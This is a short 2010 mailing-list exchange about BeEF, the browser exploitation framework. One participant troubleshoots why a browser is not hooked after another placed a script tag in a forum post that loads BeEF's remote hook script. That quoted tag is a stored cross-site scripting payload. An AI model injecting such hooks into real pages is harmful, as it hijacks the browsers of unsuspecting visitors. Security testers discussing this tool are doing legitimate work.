[WEB SECURITY] beef question

Dan Anderson dan-anderson at cox.net
Wed Jun 16 04:49:10 EDT 2010

Sorry, I see your other posting now.

>When I instead do a forum post with:
><script src="http://www.example.com/beef/hook/beefmagic.js.php"></script>
>
>...the Zombie doesn't show up (when I visit the forum post). But the
>server gets the request (and is answering with a 200 OK).

When you go to the forum page.  What does the page source (right click
src="http://www.example.com/beef/hook/beefmagic.js.php"></script>"
embedded, unmodified in the html source?

What does your server log look like?  Is the request for
"http://www.example.com/beef/hook/beefmagic.js.php"?

Dan

On Wed, Jun 16, 2010 at 3:39 AM, Dan Anderson <dan-anderson at cox.net> wrote:
> So, is the problem you are having that the zombies are not showing up
> under the "BeEF" cow?
>
> Are they showing up at all (i.e. in the zombies menu?)
>
> Dan
>

>> / Alex

Subscribe via RSS:
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]